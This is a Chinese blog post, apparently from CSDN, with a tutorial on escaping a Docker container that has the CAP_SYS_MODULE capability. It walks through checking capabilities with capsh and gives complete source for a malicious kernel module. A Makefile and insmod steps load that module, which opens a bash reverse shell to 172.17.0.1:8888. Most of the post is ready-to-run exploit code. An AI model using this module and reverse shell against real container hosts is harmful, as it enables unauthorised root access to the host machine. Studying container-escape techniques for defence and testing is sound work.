云安全(2)--CAP_SYS_MODULE逃逸

测试环境配置

docker run -it --cap-add=SYS_MODULE  ubuntu:18.04

实际环境利用

cat /proc/self/status|grep Cap

请添加图片描述
然后使用capsh decode一下

capsh --decode=00000000a80525fb

请添加图片描述
发现有CAP_SYS_MODULE权限,那么直接往内核注入恶意module,我们直接在容器里面安装必备的东西

apt update&&apt install -y gcc make  vim  linux-headers-$(uname -r) kmod

exp.c

#include <linux/module.h>
MODULE_LICENSE("GPL");
char *argv[] = {
    "/bin/bash",
    "-c",    
    "bash -i >&/dev/tcp/172.17.0.1/8888 0>&1",
    NULL    
};
static int __init connect_back_init(void)
{

    return call_usermodehelper(
        argv[0],     
        argv,        
        NULL,        
        UMH_WAIT_EXEC // don't wait for program return status
    );
}

static void __exit connect_back_exit(void)
{
}

module_init(connect_back_init);
module_exit(connect_back_exit);

Makefile

obj-m += exp.o
all:
	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) modules
clean:
	make -C /lib/modules/$(shell uname -r)/build M=$(shell pwd) clean

make all编译一下

insmod exp.ko //就会反弹shell
rmmod exp.ko
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值